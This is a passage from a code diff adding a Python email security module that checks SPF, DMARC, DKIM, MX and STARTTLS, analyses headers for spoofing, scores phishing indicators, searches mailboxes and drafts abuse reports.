capture_output=True, text=True, timeout=timeout) + output = proc.stdout + + for line in output.split('\n'): + line = line.strip() + # "mail exchanger = 10 mx1.example.com." + mx_match = re.search(r'mail exchanger\s*=\s*(\d+)\s+(\S+)', line, re.I) + if mx_match: + priority = int(mx_match.group(1)) + host = mx_match.group(2).rstrip('.') + results.append(f"{priority} {host}") + # Also handle "MX preference = 10, mail exchanger = ..." + mx_match2 = re.search(r'preference\s*=\s*(\d+).*exchanger\s*=\s*(\S+)', line, re.I) + if mx_match2: + priority = int(mx_match2.group(1)) + host = mx_match2.group(2).rstrip('.') + results.append(f"{priority} {host}") + + elif record_type in ('A', 'AAAA'): + cmd = ['nslookup', '-type=' + record_type, name] + proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout) + output = proc.stdout + + for line in output.split('\n'): + line = line.strip() + addr_match = re.search(r'Address:\s*(\S+)', line) + if addr_match: + addr = addr_match.group(1) + # Skip the DNS server address (first one, usually has #53) + if '#' not in addr and addr != name: + results.append(addr) + + except subprocess.TimeoutExpired: + pass + except FileNotFoundError: + pass + except Exception: + pass + + return results + + +def _reverse_ip(ip: str) -> str: + """Reverse an IPv4 address for DNSBL lookup.""" + parts = ip.split('.') + parts.reverse() + return '.'.join(parts) + + +def _is_valid_ip(s: str) -> bool: + """Check if string is a valid IPv4 address.""" + try: + socket.inet_aton(s) + return True + except (socket.error, OSError): + return False + + +def _resolve_domain(domain: str) -> Optional[str]: + """Resolve a domain to an IPv4 address.""" + try: + return socket.gethostbyname(domain) + except (socket.gaierror, socket.herror): + return None + + +# -- EmailSecurity class ----------------------------------------------------- + +class EmailSecurity: + """Email security analysis engine.""" + + _instance = None + + def __init__(self): + data_dir = get_data_dir() + if isinstance(data_dir, str): + data_dir = Path(data_dir) + self.storage_dir = data_dir / 'email_sec' + self.storage_dir.mkdir(parents=True, exist_ok=True) + self._cache = {} + self._cache_ttl = 300 # 5 minutes + + # -- DNS helper ---------------------------------------------------------- + + def get_dns_record(self, domain: str, record_type: str = 'TXT') -> List[str]: + """Query DNS records for a domain.""" + cache_key = f"{record_type}:{domain}" + cached = self._cache.get(cache_key) + if cached and time.time() - cached['ts'] < self._cache_ttl: + return cached['data'] + + results = _dns_query(domain, record_type) + self._cache[cache_key] = {'data': results, 'ts': time.time()} + return results + + # -- SPF ----------------------------------------------------------------- + + def check_spf(self, domain: str) -> Dict[str, Any]: + """Parse and analyze the SPF record for a domain.""" + records = self.get_dns_record(domain, 'TXT') + spf_record = None + for rec in records: + if rec.strip().startswith('v=spf1'): + spf_record = rec.strip() + break + + result = { + 'domain': domain, + 'found': spf_record is not None, + 'record': spf_record or '', + 'mechanisms': [], + 'qualifiers': {}, + 'includes': [], + 'all_policy': 'missing', + 'dns_lookups': 0, + 'findings': [], + 'status': 'fail', + } + + if not spf_record: + result['findings'].append({'level': 'fail', 'message': 'No SPF record found'}) + return result + + # Parse mechanisms + parts = spf_record.split() + lookup_count = 0 + + for part in parts[1:]: # skip v=spf1 + qualifier = '+' + mechanism = part + + if part[0] in '+-~?': + qualifier = part[0] + mechanism = part[1:] + + if mechanism.startswith('ip4:') or mechanism.startswith('ip6:'): + mtype = 'ip4' if mechanism.startswith('ip4:') else 'ip6' + value = mechanism.split(':', 1)[1] + result['mechanisms'].append({'type': mtype, 'value': value, 'qualifier': qualifier}) + elif mechanism.startswith('include:'): + include_domain = mechanism.split(':', 1)[1] + result['includes'].append(include_domain) + result['mechanisms'].append({'type': 'include', 'value': include_domain, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism.startswith('a:') or mechanism == 'a': + value = mechanism.split(':', 1)[1] if ':' in mechanism else domain + result['mechanisms'].append({'type': 'a', 'value': value, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism.startswith('mx:') or mechanism == 'mx': + value = mechanism.split(':', 1)[1] if ':' in mechanism else domain + result['mechanisms'].append({'type': 'mx', 'value': value, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism.startswith('ptr'): + result['mechanisms'].append({'type': 'ptr', 'value': mechanism, 'qualifier': qualifier}) + lookup_count += 1 + result['findings'].append({'level': 'warn', 'message': 'PTR mechanism is deprecated (RFC 7208)'}) + elif mechanism.startswith('exists:'): + value = mechanism.split(':', 1)[1] + result['mechanisms'].append({'type': 'exists', 'value': value, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism.startswith('redirect='): + value = mechanism.split('=', 1)[1] + result['mechanisms'].append({'type': 'redirect', 'value': value, 'qualifier': qualifier}) + lookup_count += 1 + elif mechanism == 'all': + result['all_policy'] = qualifier + qualifier_names = {'+': 'pass', '-': 'hardfail', '~': 'softfail', '?': 'neutral'} + result['mechanisms'].append({'type': 'all', 'value': 'all', 'qualifier': qualifier}) + result['qualifiers']['all'] = qualifier_names.get(qualifier, qualifier) + + result['dns_lookups'] = lookup_count + + # Analyze findings + if result['all_policy'] == '-': + result['findings'].append({'level': 'pass', 'message': 'SPF uses hardfail (-all) — recommended'}) + result['status'] = 'pass' + elif result['all_policy'] == '~': + result['findings'].append({'level': 'warn', 'message': 'SPF uses softfail (~all) — hardfail (-all) recommended'}) + result['status'] = 'warn' + elif result['all_policy'] == '+': + result['findings'].append({'level': 'fail', 'message': 'SPF allows all senders (+all) — anyone can spoof this domain'}) + result['status'] = 'fail' + elif result['all_policy'] == '?': + result['findings'].append({'level': 'warn', 'message': 'SPF uses neutral (?all) — provides no protection'}) + result['status'] = 'warn' + elif result['all_policy'] == 'missing': + result['findings'].append({'level': 'fail', 'message': 'No "all" mechanism — implicit +all (no protection)'}) + result['status'] = 'fail' + + if lookup_count > 10: + result['findings'].append({ + 'level': 'fail', + 'message': f'Too many DNS lookups ({lookup_count}) — SPF limit is 10 (RFC 7208)' + }) + elif lookup_count > 7: + result['findings'].append({ + 'level': 'warn', + 'message': f'{lookup_count} DNS lookups — approaching SPF limit of 10' + }) + + if len(result['includes']) > 5: + result['findings'].append({ + 'level': 'warn', + 'message': f'{len(result["includes"])} include directives — consider consolidating' + }) + + return result + + # -- DMARC --------------------------------------------------------------- + + def check_dmarc(self, domain: str) -> Dict[str, Any]: + """Parse and analyze the DMARC record for a domain.""" + dmarc_domain = f'_dmarc.{domain}' + records = self.get_dns_record(dmarc_domain, 'TXT') + dmarc_record = None + for rec in records: + if rec.strip().startswith('v=DMARC1'): + dmarc_record = rec.strip() + break + + result = { + 'domain': domain, + 'found': dmarc_record is not None, + 'record': dmarc_record or '', + 'policy': 'none', + 'subdomain_policy': None, + 'pct': 100, + 'rua': [], + 'ruf': [], + 'aspf': 'r', # relaxed + 'adkim': 'r', # relaxed + 'fo': '0', + 'findings': [], + 'status': 'fail', + } + + if not dmarc_record: + result['findings'].append({'level': 'fail', 'message': 'No DMARC record found'}) + return result + + # Parse tags + tags = {} + for part in dmarc_record.split(';'): + part = part.strip() + if '=' in part: + key, val = part.split('=', 1) + tags[key.strip()] = val.strip() + + result['policy'] = tags.get('p', 'none') + result['subdomain_policy'] = tags.get('sp') + result['pct'] = int(tags.get('pct', '100')) + result['aspf'] = tags.get('aspf', 'r') + result['adkim'] = tags.get('adkim', 'r') + result['fo'] = tags.get('fo', '0') + + if 'rua' in tags: + result['rua'] = [u.strip() for u in tags['rua'].split(',')] + if 'ruf' in tags: + result['ruf'] = [u.strip() for u in tags['ruf'].split(',')] + + # Analyze + policy = result['policy'] + if policy == 'reject': + result['findings'].append({'level': 'pass', 'message': 'DMARC policy is "reject" — strongest protection'}) + result['status'] = 'pass' + elif policy == 'quarantine': + result['findings'].append({'level': 'warn', 'message': 'DMARC policy is "quarantine" — "reject" recommended'}) + result['status'] = 'warn' + elif policy == 'none': + result['findings'].append({'level': 'fail', 'message': 'DMARC policy is "none" — no protection (monitoring only)'}) + result['status'] = 'fail' + + if result['pct'] < 100: + result['findings'].append({ + 'level': 'warn', + 'message': f'DMARC pct={result["pct"]}% — only applies to {result["pct"]}% of messages' + }) + + if not result['rua']: + result['findings'].append({'level': 'warn', 'message': 'No aggregate report URI (rua) — no visibility into failures'}) + + if result['subdomain_policy'] and result['subdomain_policy'] != policy: + result['findings'].append({ + 'level': 'warn', + 'message': f'Subdomain policy (sp={result["subdomain_policy"]}) differs from domain policy (p={policy})' + }) + + if result['aspf'] == 'r': + result['findings'].append({'level': 'warn', 'message': 'SPF alignment is relaxed — strict (aspf=s) recommended'}) + if result['adkim'] == 'r': + result['findings'].append({'level': 'warn', 'message': 'DKIM alignment is relaxed — strict (adkim=s) recommended'}) + + return result + + # -- DKIM ---------------------------------------------------------------- + + def check_dkim(self, domain: str, selectors: Optional[List[str]] = None) -> Dict[str, Any]: + """Try common DKIM selectors to find signing keys.""" + if selectors is None: + selectors = COMMON_DKIM_SELECTORS + + result = { + 'domain': domain, + 'found_selectors': [], + 'checked_selectors': selectors, + 'findings': [], + 'status': 'fail', + } + + for selector in selectors: + dkim_domain = f'{selector}._domainkey.{domain}' + records = self.get_dns_record(dkim_domain, 'TXT') + + for rec in records: + if 'v=DKIM1' in rec or 'k=' in rec or 'p=' in rec: + key_info = {'selector': selector, 'record': rec} + + # Parse key fields + tags = {} + for part in rec.split(';'): + part = part.strip() + if '=' in part: + k, v = part.split('=', 1) + tags[k.strip()] = v.strip() + + key_info['version'] = tags.get('v', '') + key_info['key_type'] = tags.get('k', 'rsa') + key_info['public_key'] = tags.get('p', '') + key_info['flags'] = tags.get('t', '') + key_info['hash_algorithms'] = tags.get('h', '') + key_info['notes'] = tags.get('n', '') + + if not tags.get('p'): + key_info['revoked'] = True + result['findings'].append({ + 'level': 'warn', + 'message': f'Selector "{selector}" has empty public key — key may be revoked' + }) + else: + key_info['revoked'] = False + + result['found_selectors'].append(key_info) + break + + if result['found_selectors']: + active = [s for s in result['found_selectors'] if not s.get('revoked')] + if active: + result['status'] = 'pass' + result['findings'].insert(0, { + 'level': 'pass', + 'message': f'Found {len(active)} active DKIM selector(s): {", ".join(s["selector"] for s in active)}' + }) + else: + result['findings'].insert(0, { + 'level': 'warn', + 'message': 'DKIM selectors found but all appear revoked' + }) + else: + result['findings'].append({ + 'level': 'warn', + 'message': f'No DKIM records found for {len(selectors)} common selectors' + }) + + return result + + # -- MX ------------------------------------------------------------------ + + def check_mx(self, domain: str) -> Dict[str, Any]: + """Query MX records and analyze mail servers.""" + mx_records = self.get_dns_record(domain, 'MX') + + result = { + 'domain': domain, + 'mx_records': [], + 'findings': [], + 'status': 'fail', + } + + if not mx_records: + result['findings'].append({'level': 'fail', 'message': 'No MX records found'}) + return result + + result['status'] = 'pass' + + for mx_entry in mx_records: + parts = mx_entry.split(None, 1) + if len(parts) == 2: + priority = int(parts[0]) + host = parts[1].rstrip('.') + else: + priority = 0 + host = mx_entry.rstrip('.') + + mx_info = { + 'priority': priority, + 'host': host, + 'ip': _resolve_domain(host), + 'starttls': False, + 'starttls_error': None, + } + + # Check STARTTLS + tls_result = self.check_starttls(host) + mx_info['starttls'] = tls_result.get('starttls', False) + mx_info['starttls_error'] = tls_result.get('error') + mx_info['banner'] = tls_result.get('banner', '') + + if not mx_info['starttls']: + result['findings'].append({ + 'level': 'warn', + 'message': f'MX {host} does not support STARTTLS' + }) + + result['mx_records'].append(mx_info) + + result['mx_records'].sort(key=lambda x: x['priority']) + + if len(result['mx_records']) == 1: + result['findings'].append({ + 'level': 'warn', + 'message': 'Only one MX record — no redundancy for mail delivery' + }) + + all_tls = all(mx['starttls'] for mx in result['mx_records']) + if all_tls: + result['findings'].insert(0, { + 'level': 'pass', + 'message': f'All {len(result["mx_records"])} MX servers support STARTTLS' + }) + + return result + + # -- STARTTLS ------------------------------------------------------------ + + def check_starttls(self, host: str, port: int = 25) -> Dict[str, Any]: + """Check if an SMTP server supports STARTTLS.""" + result = { + 'host': host, + 'port': port, + 'starttls': False, + 'banner': '', + 'tls_version': None, + 'cipher': None, + 'error': None, + } + + try: + sock = socket.create_connection((host, port), timeout=8) + banner = sock.recv(1024).decode('utf-8', errors='replace').strip() + result['banner'] = banner + + # Send EHLO + sock.sendall(b'EHLO autarch.local\r\n') + ehlo_resp = sock.recv(4096).decode('utf-8', errors='replace') + + if 'STARTTLS' in ehlo_resp.upper(): + result['starttls'] = True + + # Try upgrading + sock.sendall(b'STARTTLS\r\n') + tls_resp = sock.recv(1024).decode('utf-8', errors='replace') + + if tls_resp.startswith('220'): + try: + context = ssl.create_default_context() + context.check_hostname = False + context.verify_mode = ssl.CERT_NONE + tls_sock = context.wrap_socket(sock, server_hostname=host) + result['tls_version'] = tls_sock.version() + cipher = tls_sock.cipher() + if cipher: + result['cipher'] = cipher[0] + tls_sock.close() + return result + except ssl.SSLError as e: + result['error'] = f'TLS handshake failed: {e}' + + sock.sendall(b'QUIT\r\n') + sock.close() + except socket.timeout: + result['error'] = 'Connection timed out' + except ConnectionRefusedError: + result['error'] = 'Connection refused' + except Exception as e: + result['error'] = str(e) + + return result + + # -- Domain Analysis (full) ---------------------------------------------- + + def analyze_domain(self, domain: str) -> Dict[str, Any]: + """Comprehensive email security analysis for a domain.""" + domain = domain.strip().lower() + + spf = self.check_spf(domain) + dmarc = self.check_dmarc(domain) + dkim = self.check_dkim(domain) + mx = self.check_mx(domain) + + # Calculate overall score + scores = {'pass': 0, 'warn': 0, 'fail': 0} + for check in [spf, dmarc, dkim, mx]: + status = check.get('status', 'fail') + scores[status] = scores.get(status, 0) + 1 + + total = sum(scores.values()) + if total > 0: + score = int(((scores['pass'] * 100) + (scores['warn'] * 50)) / total) + else: + score = 0 + + # Grade + if score >= 90: + grade = 'A' + elif score >= 75: + grade = 'B' + elif score >= 60: + grade = 'C' + elif score >= 40: + grade = 'D' + else: + grade = 'F' + + result = { + 'domain': domain, + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'spf': spf, + 'dmarc': dmarc, + 'dkim': dkim, + 'mx': mx, + 'score': score, + 'grade': grade, + 'summary': { + 'spf_status': spf['status'], + 'dmarc_status': dmarc['status'], + 'dkim_status': dkim['status'], + 'mx_status': mx['status'], + } + } + + # Save analysis + self._save_analysis(domain, result) + return result + + # -- Header Analysis ----------------------------------------------------- + + def analyze_headers(self, raw_headers: str) -> Dict[str, Any]: + """Parse and analyze email headers for security issues.""" + result = { + 'received_chain': [], + 'authentication': { + 'spf': 'none', + 'dkim': 'none', + 'dmarc': 'none', + }, + 'from': '', + 'return_path': '', + 'reply_to': '', + 'message_id': '', + 'date': '', + 'subject': '', + 'originating_ip': None, + 'spoofing_indicators': [], + 'findings': [], + } + + # Parse with email module + msg = email.message_from_string(raw_headers) + + # Extract basic headers + result['from'] = str(msg.get('From', '')) + result['return_path'] = str(msg.get('Return-Path', '')) + result['reply_to'] = str(msg.get('Reply-To', '')) + result['message_id'] = str(msg.get('Message-ID', '')) + result['date'] = str(msg.get('Date', '')) + result['subject'] = str(msg.get('Subject', '')) + + # Decode encoded headers + for field in ['from', 'subject', 'reply_to']: + val = result[field] + if val and '=?' in val: + decoded_parts = email.header.decode_header(val) + decoded = '' + for part, charset in decoded_parts: + if isinstance(part, bytes): + decoded += part.decode(charset or 'utf-8', errors='replace') + else: + decoded += str(part) + result[field] = decoded + + # Parse Received chain + received_headers = msg.get_all('Received', []) + for i, recv in enumerate(received_headers): + hop = {'raw': recv, 'hop': i + 1} + + # Extract from/by + from_match = re.search(r'from\s+(\S+)', recv, re.I) + by_match = re.search(r'by\s+(\S+)', recv, re.I) + if from_match: + hop['from'] = from_match.group(1) + if by_match: + hop['by'] = by_match.group(1) + + # Extract IP + ip_match = re.search(r'\[(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})\]', recv) + if ip_match: + hop['ip'] = ip_match.group(1) + + # Extract timestamp + ts_match = re.search(r';\s*(.+?)$', recv) + if ts_match: + hop['timestamp'] = ts_match.group(1).strip() + + result['received_chain'].append(hop) + + # Originating IP (last Received header — outermost hop) + if result['received_chain']: + for hop in reversed(result['received_chain']): + if hop.get('ip') and not hop['ip'].startswith(('10.', '192.168.', '172.')): + result['originating_ip'] = hop['ip'] + break + + # Parse Authentication-Results + auth_results = msg.get_all('Authentication-Results', []) + for ar in auth_results: + ar_lower = ar.lower() + if 'spf=' in ar_lower: + spf_match = re.search(r'spf=(\w+)', ar_lower) + if spf_match: + result['authentication']['spf'] = spf_match.group(1) + if 'dkim=' in ar_lower: + dkim_match = re.search(r'dkim=(\w+)', ar_lower) + if dkim_match: + result['authentication']['dkim'] = dkim_match.group(1) + if 'dmarc=' in ar_lower: + dmarc_match = re.search(r'dmarc=(\w+)', ar_lower) + if dmarc_match: + result['authentication']['dmarc'] = dmarc_match.group(1) + + # Spoofing indicators + from_addr = result['from'] + return_path = result['return_path'] + reply_to = result['reply_to'] + + # Extract domain from From header + from_domain_match = re.search(r'@([\w.-]+)', from_addr) + from_domain = from_domain_match.group(1) if from_domain_match else '' + + rp_domain_match = re.search(r'@([\w.-]+)', return_path) + rp_domain = rp_domain_match.group(1) if rp_domain_match else '' + + if from_domain and rp_domain and from_domain.lower() != rp_domain.lower(): + result['spoofing_indicators'].append({ + 'level': 'warn', + 'indicator': 'From/Return-Path mismatch', + 'detail': f'From domain: {from_domain}, Return-Path domain: {rp_domain}' + }) + + if reply_to: + rt_domain_match = re.search(r'@([\w.-]+)', reply_to) + rt_domain = rt_domain_match.group(1) if rt_domain_match else '' + if from_domain and rt_domain and from_domain.lower() != rt_domain.lower(): + result['spoofing_indicators'].append({ + 'level': 'warn', + 'indicator': 'From/Reply-To mismatch', + 'detail': f'From domain: {from_domain}, Reply-To domain: {rt_domain}' + }) + + # Check authentication failures + for auth_type, auth_result in result['authentication'].items(): + if auth_result == 'fail': + result['findings'].append({ + 'level': 'fail', + 'message': f'{auth_type.upper()} authentication failed' + }) + elif auth_result == 'pass': + result['findings'].append({ + 'level': 'pass', + 'message': f'{auth_type.upper()} authentication passed' + }) + elif auth_result == 'none': + result['findings'].append({ + 'level': 'warn', + 'message': f'No {auth_type.upper()} authentication result' + }) + + # Check for suspicious Received hops + if len(result['received_chain']) > 8: + result['findings'].append({ + 'level': 'warn', + 'message': f'Unusually long Received chain ({len(result["received_chain"])} hops)' + }) + + return result + + # -- Phishing Detection -------------------------------------------------- + + def detect_phishing(self, email_content: str) -> Dict[str, Any]: + """Analyze email content for phishing indicators.""" + result = { + 'risk_score': 0, + 'risk_level': 'low', + 'findings': [], + 'urls_found': [], + 'suspicious_urls': [], + 'attachment_refs': [], + } + + content_lower = email_content.lower() + total_weight = 0 + + # Check each indicator category + for category, info in PHISHING_INDICATORS.items(): + category_hits = [] + for pattern in info['patterns']: + matches = re.findall(pattern, content_lower, re.I) + if matches: + category_hits.extend(matches) + + if category_hits: + total_weight += info['weight'] + result['findings'].append({ + 'category': category, + 'severity': 'high' if info['weight'] >= 25 else 'medium' if info['weight'] >= 15 else 'low', + 'matches': list(set(str(m) if isinstance(m, str) else str(m) for m in category_hits[:10])), + 'weight': info['weight'], + }) + + # Extract and analyze URLs + urls = re.findall(r'https?://[^\s<>"\')\]]+', email_content, re.I) + result['urls_found'] = list(set(urls)) + + for url in result['urls_found']: + suspicious_reasons = [] + parsed = urlparse(url) + hostname = parsed.hostname or '' + + # IP-based URL + if _is_valid_ip(hostname): + suspicious_reasons.append('IP-based URL') + + # URL shortener + if hostname.lower() in URL_SHORTENER_DOMAINS: + suspicious_reasons.append('URL shortener') + + # Suspicious TLD + for tld in SUSPICIOUS_TLDS: + if hostname.endswith(tld): + suspicious_reasons.append(f'Suspicious TLD ({tld})') + break + + # Long subdomain (possible typosquatting) + parts = hostname.split('.') + if len(parts) > 4: + suspicious_reasons.append('Excessive subdomains') + + # @-symbol in URL (credential harvesting trick) + if '@' in url: + suspicious_reasons.append('Contains @ symbol (possible credential trick)') + + # Homograph / punycode + if hostname.startswith('xn--'): + suspicious_reasons.append('Punycode/IDN domain') + + if suspicious_reasons: + result['suspicious_urls'].append({ + 'url': url, + 'reasons': suspicious_reasons, + }) + total_weight += 10 + + # Check for attachment references + attachment_exts = re.findall( + r'[\w.-]+\.(exe|scr|bat|cmd|com|pif|vbs|vbe|js|jse|wsf|wsh|ps1|msi|dll|docm|xlsm|pptm|iso|img|hta|lnk|zip|rar|7z)', + content_lower + ) + if attachment_exts: + result['attachment_refs'] = list(set(attachment_exts)) + total_weight += 15 + + # Calculate risk score (0-100) + result['risk_score'] = min(100, total_weight) + if result['risk_score'] >= 70: + result['risk_level'] = 'critical' + elif result['risk_score'] >= 50: + result['risk_level'] = 'high' + elif result['risk_score'] >= 30: + result['risk_level'] = 'medium' + else: + result['risk_level'] = 'low' + + return result + + # -- Mailbox Search ------------------------------------------------------ + + def search_mailbox(self, host: str, username: str, password: str, + protocol: str = 'imap', search_query: Optional[str] = None, + folder: str = 'INBOX', use_ssl: bool = True) -> Dict[str, Any]: + """Connect to a mailbox and search for emails.""" + result = { + 'host': host, + 'protocol': protocol, + 'folder': folder, + 'messages': [], + 'total': 0, + 'error': None, + } + + try: + if protocol.lower() == 'imap': + result = self._search_imap(host, username, password, search_query, folder, use_ssl) + elif protocol.lower() == 'pop3': + result = self._search_pop3(host, username, password, search_query, use_ssl) + else: + result['error'] = f'Unsupported protocol: {protocol}' + except Exception as e: + result['error'] = str(e) + + return result + + def _search_imap(self, host: str, username: str, password: str, + search_query: Optional[str], folder: str, use_ssl: bool) -> Dict: + """Search via IMAP.""" + result = {'host': host, 'protocol': 'imap', 'folder': folder, 'messages': [], 'total': 0, 'error': None} + + try: + if use_ssl: + conn = imaplib.IMAP4_SSL(host, timeout=15) + else: + conn = imaplib.IMAP4(host, timeout=15) + + conn.login(username, password) + conn.select(folder, readonly=True) + + # Build search criteria + if search_query: + # Support simple search syntax + criteria = search_query.upper() + if not criteria.startswith('('): + # Wrap simple queries + if '@' in search_query: + criteria = f'(FROM "{search_query}")' + elif re.match(r'\d{1,2}-\w{3}-\d{4}', search_query): + criteria = f'(SINCE "{search_query}")' + else: + criteria = f'(SUBJECT "{search_query}")' + else: + criteria = 'ALL' + + status, data = conn.search(None, criteria) + if status != 'OK': + result['error'] = 'Search failed' + conn.logout() + return result + + msg_ids = data[0].split() + result['total'] = len(msg_ids) + + # Fetch last 50 message summaries + for msg_id in msg_ids[-50:]: + status, msg_data = conn.fetch(msg_id, '(RFC822.SIZE BODY[HEADER.FIELDS (FROM SUBJECT DATE MESSAGE-ID)])') + if status == 'OK' and msg_data[0]: + header_data = msg_data[0][1] if isinstance(msg_data[0], tuple) else msg_data[0] + if isinstance(header_data, bytes): + header_data = header_data.decode('utf-8', errors='replace') + + msg = email.message_from_string(header_data) + size = 0 + # Try to get size from FETCH response + if isinstance(msg_data[0], tuple): + size_match = re.search(r'RFC822\.SIZE\s+(\d+)', str(msg_data[0][0])) + if size_match: + size = int(size_match.group(1)) + + summary = { + 'id': msg_id.decode() if isinstance(msg_id, bytes) else str(msg_id), + 'from': str(msg.get('From', '')), + 'subject': str(msg.get('Subject', '')), + 'date': str(msg.get('Date', '')), + 'message_id': str(msg.get('Message-ID', '')), + 'size': size, + } + + # Decode encoded headers + for field in ['from', 'subject']: + if summary[field] and '=?' in summary[field]: + try: + decoded_parts = email.header.decode_header(summary[field]) + decoded = '' + for part, charset in decoded_parts: + if isinstance(part, bytes): + decoded += part.decode(charset or 'utf-8', errors='replace') + else: + decoded += str(part) + summary[field] = decoded + except Exception: + pass + + result['messages'].append(summary) + + conn.logout() + except imaplib.IMAP4.error as e: + result['error'] = f'IMAP error: {e}' + except Exception as e: + result['error'] = str(e) + + return result + + def _search_pop3(self, host: str, username: str, password: str, + search_query: Optional[str], use_ssl: bool) -> Dict: + """Search via POP3 (limited — retrieves headers of recent messages).""" + result = {'host': host, 'protocol': 'pop3', 'folder': 'INBOX', 'messages': [], 'total': 0, 'error': None} + + try: + if use_ssl: + conn = poplib.POP3_SSL(host, timeout=15) + else: + conn = poplib.POP3(host, timeout=15) + + conn.user(username) + conn.pass_(password) + + count, size = conn.stat() + result['total'] = count + + # Fetch last 50 messages' headers + start = max(1, count - 49) + query_lower = search_query.lower() if search_query else None + + for i in range(start, count + 1): + resp, lines, octets = conn.top(i, 0) + header_text = b'\r\n'.join(lines).decode('utf-8', errors='replace') + msg = email.message_from_string(header_text) + + summary = { + 'id': str(i), + 'from': str(msg.get('From', '')), + 'subject': str(msg.get('Subject', '')), + 'date': str(msg.get('Date', '')), + 'message_id': str(msg.get('Message-ID', '')), + 'size': octets, + } + + # Apply client-side filter + if query_lower: + match = (query_lower in summary['from'].lower() or + query_lower in summary['subject'].lower()) + if not match: + continue + + result['messages'].append(summary) + + conn.quit() + except Exception as e: + result['error'] = str(e) + + return result + + # -- Fetch Full Email ---------------------------------------------------- + + def fetch_email(self, host: str, username: str, password: str, + message_id: str, protocol: str = 'imap', + use_ssl: bool = True) -> Dict[str, Any]: + """Fetch a complete email by message ID.""" + result = {'message_id': message_id, 'raw_headers': '', 'body': '', 'attachments': [], 'error': None} + + try: + if protocol.lower() == 'imap': + if use_ssl: + conn = imaplib.IMAP4_SSL(host, timeout=15) + else: + conn = imaplib.IMAP4(host, timeout=15) + + conn.login(username, password) + conn.select('INBOX', readonly=True) + + status, data = conn.fetch(message_id.encode() if isinstance(message_id, str) else message_id, + '(RFC822)') + if status == 'OK' and data[0]: + raw = data[0][1] if isinstance(data[0], tuple) else data[0] + if isinstance(raw, bytes): + raw = raw.decode('utf-8', errors='replace') + + msg = email.message_from_string(raw) + + # Headers + header_keys = ['From', 'To', 'Cc', 'Subject', 'Date', 'Message-ID', + 'Return-Path', 'Reply-To', 'Received', + 'Authentication-Results', 'DKIM-Signature', + 'X-Mailer', 'X-Originating-IP'] + headers_text = '' + for key in header_keys: + vals = msg.get_all(key, []) + for v in vals: + headers_text += f'{key}: {v}\n' + result['raw_headers'] = headers_text + + # Body + if msg.is_multipart(): + for part in msg.walk(): + ct = part.get_content_type() + cd = str(part.get('Content-Disposition', '')) + + if 'attachment' in cd: + result['attachments'].append({ + 'filename': part.get_filename() or 'unknown', + 'content_type': ct, + 'size': len(part.get_payload(decode=True) or b''), + }) + elif ct == 'text/plain': + payload = part.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + elif ct == 'text/html' and not result['body']: + payload = part.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + else: + payload = msg.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + + conn.logout() + + elif protocol.lower() == 'pop3': + if use_ssl: + conn = poplib.POP3_SSL(host, timeout=15) + else: + conn = poplib.POP3(host, timeout=15) + + conn.user(username) + conn.pass_(password) + + resp, lines, octets = conn.retr(int(message_id)) + raw = b'\r\n'.join(lines).decode('utf-8', errors='replace') + msg = email.message_from_string(raw) + + result['raw_headers'] = '\n'.join( + f'{k}: {v}' for k, v in msg.items() + ) + + if msg.is_multipart(): + for part in msg.walk(): + ct = part.get_content_type() + if ct == 'text/plain': + payload = part.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + break + else: + payload = msg.get_payload(decode=True) + if payload: + result['body'] = payload.decode('utf-8', errors='replace') + + conn.quit() + + except Exception as e: + result['error'] = str(e) + + return result + + # -- Abuse Report -------------------------------------------------------- + + def generate_abuse_report(self, incident_data: Dict[str, Any]) -> Dict[str, Any]: + """Generate a formatted abuse report for ISP/hosting provider.""" + now = datetime.now(timezone.utc).strftime('%Y-%m-%d %H:%M:%S UTC') + incident_type = incident_data.get('type', 'spam/phishing') + source_ip = incident_data.get('source_ip', 'Unknown') + source_domain = incident_data.get('source_domain', 'Unknown') + description = incident_data.get('description', '') + evidence_headers = incident_data.get('headers', '') + evidence_urls = incident_data.get('urls', []) + reporter_name = incident_data.get('reporter_name', 'AUTARCH Security Platform') + reporter_email = incident_data.get('reporter_email', '') + + report_lines = [ + '=' * 72, + 'ABUSE REPORT', + '=' * 72, + '', + f'Date: {now}', + f'Report Type: {incident_type}', + f'Reporter: {reporter_name}', + ] + if reporter_email: + report_lines.append(f'Reporter Email: {reporter_email}') + + report_lines += [ + '', + '-' * 72, + 'INCIDENT DETAILS', + '-' * 72, + '', + f'Source IP: {source_ip}', + f'Source Domain: {source_domain}', + f'Incident Type: {incident_type}', + '', + 'Description:', + description or '(No description provided)', + '', + ] + + if evidence_headers: + report_lines += [ + '-' * 72, + 'EVIDENCE — EMAIL HEADERS', + '-' * 72, + '', + evidence_headers, + '', + ] + + if evidence_urls: + report_lines += [ + '-' * 72, + 'EVIDENCE — MALICIOUS URLs', + '-' * 72, + '', + ] + for url in evidence_urls: + report_lines.append(f' - {url}') + report_lines.append('') + + report_lines += [ + '-' * 72, + 'REQUESTED ACTION', + '-' * 72, + '', + 'We request that you:', + ' 1. Investigate the reported IP address/domain for abusive activity', + ' 2. Take appropriate action (suspension, warning, content removal)', + ' 3. Implement measures to prevent recurring abuse', + ' 4. Respond with your findings and actions taken', + '', + '-' * 72, + 'ADDITIONAL INFORMATION', + '-' * 72, + '', + 'This report was generated by AUTARCH Security Platform.', + 'The evidence presented is accurate and collected through legitimate', + 'security analysis. We are available for further investigation if needed.', + '', + '=' * 72, + ] + + report_text = '\n'.join(report_lines) + + # Save the report + report_id = hashlib.md5(f'{now}:{source_ip}:{incident_type}'.encode()).hexdigest()[:12] + report_path = self.storage_dir / f'abuse_report_{report_id}.txt' + with open(report_path, 'w') as f: + f.write(report_text) + + return { + 'report_id': report_id, + 'report_text': report_text, + 'saved_to': str(report_path), + } + + # -- Blacklist Check ----------------------------------------------------- + + def check_blacklists(self, ip_or_domain: str) -> Dict[str, Any]: + """Check if an IP or domain is on common email blacklists.""" + ip_or_domain = ip_or_domain.strip() + + # Resolve domain to IP if needed + if _is_valid_ip(ip_or_domain): + ip = ip_or_domain + else: + ip = 